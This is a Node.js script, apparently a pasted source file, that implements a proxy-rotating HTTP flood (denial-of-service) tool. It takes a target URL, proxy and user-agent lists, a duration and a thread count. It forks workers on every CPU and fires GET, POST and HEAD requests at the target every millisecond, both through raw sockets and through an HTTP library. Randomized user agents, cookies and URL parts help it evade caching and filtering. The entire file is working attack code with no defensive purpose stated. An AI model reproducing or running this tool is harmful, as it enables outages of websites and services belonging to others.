const request = require('request');const cluster = require('cluster');cons

1. const request = require('request');
2. const cluster = require('cluster');
3.  
4. const net = require('net');
5. const fs = require('fs');
6.  
7. const args = require('minimist')(process.argv.slice(2));
8. const proc_count = require('os').cpus().length;
9.  
10. //check if args are specified.
11.  
12. if(args['url'] == null)
13. {
14. return console.log('URL must be specified using the --url argument.');
15. }
16. else if(args['type'] == null)
17. {
18. return console.log('The request type must be specified using the --type argument. (post/head/get/rand)');
19. }
20. else if(args['proxyfile'] == null)
21. {
22. return console.log('Proxy file path must be specified using the --proxyfile argument.');
23. }
24. else if(args['uafile'] == null)
25. {
26. return console.log('User-agent file path must be specified using the --uafile argument.');
27. }
28. else if(args['time'] == null)
29. {
30. return console.log('Execution time must be specified using the --time argument (seconds).');
31. }
32. else if(args['repeat'] == null)
33. {
34. return console.log('Repeat amount must be specified using the --repeat argument.');
35. }
36. else if(args['threads'] == null)
37. {
38. return console.log('The number of threads must be specified using the --threads argument.');
39. }
40. else if(args['mode'] == null)
41. {
42. return console.log('You must specify the attack mode using the --mode argument. (socket/http)');
43. }
44.  
45.  
46. //check if files exist.
47.  
48. if(!fs.existsSync(args['proxyfile']))
49. {
50. return console.log('Proxy file does not exist.');
51. }
52.  
53. if(!fs.existsSync(args['uafile']))
54. {
55. return console.log('UA file does not exist.');
56. }
57.  
58. //error checking
59.  
60. process.on('unhandledRejection', err => {
61.  
62. console.log("[x] Internal error occured.");
63.  
64. });
65.  
66. process.on('uncaughtException', err => {
67.  
68. console.log("[x] Internal error occured.");
69.  
70.  
71. });
72.  
73.  
74. //save files in array.
75.  
76. const proxies = fs.readFileSync(args['proxyfile'], 'utf-8').toString().split("\n");
77. const uas = fs.readFileSync(args['uafile'], 'utf-8').toString().split("\n");
78.  
79. //remove proxies if needed.
80.  
81. if(args['max'] != null)
82. {
83. if(args['max'] <= proxies.length)
84. {
85. var left = proxies.length - args['max'];
86.  
87. for(var i = 0; i < left; i++)
88. {
89. proxies.splice(Math.floor(Math.random() * proxies.length), 1);
90. }
91. }
92. }
93.  
94. var s_requests = 0;
95.  
96. function s_random(length) {
97.  
98. var result = '';
99. var characters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
100. var charactersLength = characters.length;
101.  
102. for ( var i = 0; i < length; i++ ) {
103. result += characters.charAt(Math.floor(Math.random() * charactersLength));
104. }
105.  
106. return result;
107. }
108.  
109. async function send_http(type, proxy)
110. {
111. var a_url = args['url'];
112.  
113. if(a_url.search("%RAND%"))
114. {
115. a_url = a_url.replace("%RAND%", s_random(5));
116. }
117.  
118. function setImmediatePromise() {
119. return new Promise((resolve) => {
120. setImmediate(() => resolve());
121. });
122. }
123.  
124. for(var i = 0; i < args['repeat']; i++)
125. {
126. if(type == "post")
127. {
128. var data = null;
129.  
130. if(args['params'] == null)
131. {
132. data = {
133.  
134. url: a_url,
135. headers: {
136. 'content-type' : 'application/x-www-form-urlencoded',
137. 'user-agent': uas[Math.floor(Math.random() * uas.length)],
138. 'referer': a_url
139. },
140. proxy: 'http://' + proxy
141.  
142. }
143. }
144. else
145. {
146. data = {
147.  
148. url: a_url,
149. headers: {
150. 'content-type' : 'application/x-www-form-urlencoded',
151. 'user-agent': uas[Math.floor(Math.random() * uas.length)],
152. 'referer': a_url
153. },
154. proxy: 'http://' + proxy,
155. body: args['params']
156.  
157. }
158. }
159.  
160. if(args['cookie'])
161. {
162. data.headers['cookie'] = getCookieString();
163. }
164.  
165. request.post(data, function(error, response) {
166.  
167. });
168. }
169. else if(type == "get")
170. {
171. var data = {
172. url: a_url,
173. proxy: 'http://' + proxy,
174. headers: {
175. 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36',
176. 'referer': a_url
177. }
178. };
179.  
180. if(args['cookie'])
181. {
182. data.headers['cookie'] = getCookieString();
183. }
184.  
185. request.get(data);
186. }
187. else if(type == "head")
188. {
189. var data = { url: a_url, proxy: 'http://' + proxy, headers: { 'user-agent': uas[Math.floor(Math.random() * uas.length)], 'referer': a_url } };
190.  
191. if(args['cookie'])
192. {
193. data.headers['cookie'] = getCookieString();
194. }
195.  
196. request.head(data);
197. }
198. else if(type == "rand")
199. {
200. switch(Math.floor(Math.random() * Math.floor(3)))
201. {
202. case 0:
203. {
204. var data = null;
205.  
206. if(args['params'] == null)
207. {
208. data = {
209.  
210. url: a_url,
211. headers: {
212. 'content-type' : 'application/x-www-form-urlencoded',
213. 'user-agent': uas[Math.floor(Math.random() * uas.length)],
214. 'referer': a_url
215. },
216. proxy: 'http://' + proxy
217.  
218. }
219. }
220. else
221. {
222. data = {
223.  
224. url: a_url,
225. headers: {
226. 'content-type' : 'application/x-www-form-urlencoded',
227. 'user-agent': uas[Math.floor(Math.random() * uas.length)],
228. 'referer': a_url
229. },
230. proxy: 'http://' + proxy,
231. body: args['params']
232.  
233. }
234. }
235.  
236. if(args['cookie'])
237. {
238. data.headers['cookie'] = getCookieString();
239. }
240.  
241. request.post(data);
242. break;
243. }
244. case 1:
245. {
246.  
247. var data = { url: a_url, proxy: 'http://' + proxy, headers: { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36', 'referer': a_url } };
248.  
249. if(args['cookie'])
250. {
251. data.headers['cookie'] = getCookieString();
252. }
253.  
254. request.get(data);
255. break;
256. }
257. case 2:
258. {
259. var data = { url: a_url, proxy: 'http://' + proxy, headers: { 'user-agent': uas[Math.floor(Math.random() * uas.length)], 'referer': a_url } };
260.  
261. if(args['cookie'])
262. {
263. data.headers['cookie'] = getCookieString();
264. }
265.  
266. request.head(data);
267. break;
268. }
269. }
270. }
271.  
272. await setImmediatePromise();
273. }
274. }
275.  
276. function getCookieString()
277. {
278. return s_random(5) + '=' + s_random(5) + '; ' + s_random(5) + '=' + s_random(5) + ";";
279. }
280.  
281. function send(type, proxy)
282. {
283. var a_url = args['url'];
284.  
285. if(a_url.search("%RAND%"))
286. {
287. a_url = a_url.replace("%RAND%", s_random(5));
288. }
289.  
290. var prox = proxy.split(":");
291.  
292. let socket = net.connect({ host: prox[0], port: prox[1] });
293.  
294. socket.once('error', err => {
295.  
296. });
297.  
298. socket.once('disconnect', () => {
299.  
300.  
301.  
302. });
303.  
304. socket.once('data', data => {
305.  
306. });
307.  
308. let userAgent = uas[Math.floor(Math.random() * uas.length)];
309.  
310. if (!a_url.startsWith('http://') && !a_url.startsWith('https://'))
311. a_url = 'http://' + a_url;
312.  
313.  
314. for(var i = 0; i < args['repeat']; i++)
315. {
316.  
317. var cookieString = "";
318.  
319. if(args['cookie'])
320. {
321. cookieString = "\r\nCookie: " + getCookieString();
322. }
323.  
324. if(type == "post")
325. {
326. var data = null;
327.  
328. if(args['params'] == null)
329. {
330. socket.write(`POST /${a_url.split('//')[1].split('/')[1]} HTTP/1.1\r\nHost: ${a_url.split('//')[1].split('/')[0]}\r\nReferer: ${args['url']}\r\nAccept: */*${cookieString}\r\nUser-Agent: ${userAgent}\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\nCache-Control: max-age=0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 0\r\n\r\n`);
331. }
332. else
333. {
334. socket.write(`POST /${a_url.split('//')[1].split('/')[1]} HTTP/1.1\r\nHost: ${a_url.split('//')[1].split('/')[0]}\r\nReferer: ${args['url']}\r\nAccept: */*${cookieString}\r\nUser-Agent: ${userAgent}\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\nCache-Control: max-age=0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: ${args['params'].length}\r\n\r\n${args['params']}\r\n`);
335. }
336.  
337. }
338. else if(type == "get")
339. {
340. socket.write(`GET ${a_url} HTTP/1.1\r\nHost: ${a_url.split('//')[1].split('/')[0]}\r\nReferer: ${args['url']}\r\nAccept: */*${cookieString}\r\nUser-Agent: ${userAgent}\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\nCache-Control: max-age=0\r\n\r\n`);
341. }
342. else if(type == "head")
343. {
344. socket.write(`HEAD /${a_url.split('//')[1].split('/')[1]} HTTP/1.1\r\nHost: ${a_url.split('//')[1].split('/')[0]}\r\nReferer: ${args['url']}\r\nAccept: */*${cookieString}\r\nUser-Agent: ${userAgent}\r\n\r\n`);
345.  
346. // console.log("[+] HEAD request has been sent. ");
347. }
348. else if(type == "rand")
349. {
350. switch(Math.floor(Math.random() * Math.floor(3)))
351. {
352. case 0:
353. {
354. var data = null;
355.  
356. if(args['params'] == null)
357. {
358. socket.write(`POST /${a_url.split('//')[1].split('/')[1]} HTTP/1.1\r\nHost: ${a_url.split('//')[1].split('/')[0]}\r\nReferer: ${args['url']}\r\nAccept: */*${cookieString}\r\nUser-Agent: ${userAgent}\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\nCache-Control: max-age=0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 0\r\n\r\n`);
359. }
360. else
361. {
362. socket.write(`POST /${a_url.split('//')[1].split('/')[1]} HTTP/1.1\r\nHost: ${a_url.split('//')[1].split('/')[0]}\r\nReferer: ${args['url']}\r\nAccept: */*${cookieString}\r\nUser-Agent: ${userAgent}\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\nCache-Control: max-age=0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: ${args['params'].length}\r\n\r\n${args['params']}\r\n`);
363. }
364. break;
365. }
366. case 1:
367. {
368. socket.write(`GET ${a_url} HTTP/1.1\r\nHost: ${a_url.split('//')[1].split('/')[0]}\r\nReferer: ${args['url']}\r\nAccept: */*${cookieString}\r\nUser-Agent: ${userAgent}\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\nCache-Control: max-age=0\r\n\r\n`);
369. break;
370. }
371. case 2:
372. {
373. socket.write(`HEAD /${a_url.split('//')[1].split('/')[1]} HTTP/1.1\r\nHost: ${a_url.split('//')[1].split('/')[0]}\r\nReferer: ${args['url']}\r\nAccept: */*${cookieString}\r\nUser-Agent: ${userAgent}\r\n\r\n`);
374. break;
375. }
376. }
377. }
378.  
379. }
380. }
381.  
382. if(cluster.isMaster)
383. {
384. var request_counter = 0;
385. var workers_left = 0;
386.  
387. console.log("[+] " + proxies.length + " proxies have been loaded.");
388. console.log("[+] Process has been started for " + args['time'] + " seconds.");
389. console.log("[?] Running on " + proc_count + " CPUs.");
390.  
391. for(var i = 0; i < args['threads']; i++)
392. {
393. let worker = cluster.fork();
394.  
395. // console.log("Spawned 1 worker.");
396.  
397. if(i == args['threads'] - 1)
398. {
399. worker.send({ id: worker.id, proxy: proxies });
400. }
401. else
402. {
403. worker.send({ id: worker.id, proxy: proxies.splice(0, Math.ceil(proxies.length / args['threads'])) });
404. }
405. }
406.  
407. cluster.on('exit', (worker, code, signal) => {
408.  
409.  
410. });
411. }
412. else
413. {
414. process.on('message', data => {
415.  
416. var int = setInterval(() => {
417.  
418. for(var i = 0; i < data.proxy.length; i++)
419. {
420. //send request
421.  
422. if(args['mode'] == "socket")
423. {
424. send(args['type'], data.proxy[i]);
425. }
426. else if(args['mode'] == "http")
427. {
428. send_http(args['type'], data.proxy[i]);
429. }
430. else
431. {
432. console.log("Invalid mode specified. (socket/http)");
433. process.exit(1)
434. }
435. }
436.  
437. }, 1);
438.  
439. });
440.  
441. }
442.  
443. setTimeout(() => {
444. console.log("[x] Time is up! Shuttin down.. (" + s_requests + " requests sent)");
445. process.exit(1)
446. }, args['time'] * 1000);